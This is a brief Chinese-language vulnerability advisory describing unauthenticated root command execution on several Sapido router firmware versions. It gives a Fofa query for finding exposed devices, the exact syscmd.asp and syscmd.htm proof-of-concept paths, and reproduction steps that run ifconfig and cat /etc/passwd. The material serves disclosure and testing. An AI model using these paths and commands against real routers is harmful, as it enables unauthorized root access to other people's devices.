1.漏洞描述
Sapido路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以root权限执行任意命令。
2.影响版本
BR270n-v2.1.03
BRC76n-v2.1.03
GR297-v2.1.3
RB1732-v2.0.43
3.网络资产查找
Fofa:app="Sapido-路由器"
4.POC
http://xxx.xxx.xxx.xxx/syscmd.asp
http://xxx.xxx.xxx.xxx/syscmd.htm
5.漏洞复现
1)访问Sapido路由器web登录页面
2)访问POC进入命令执行页面
http://xxx.xxx.xxx.xxx:1080/syscmd.htm
3)执行ifconfig、cat /etc/passwd等命令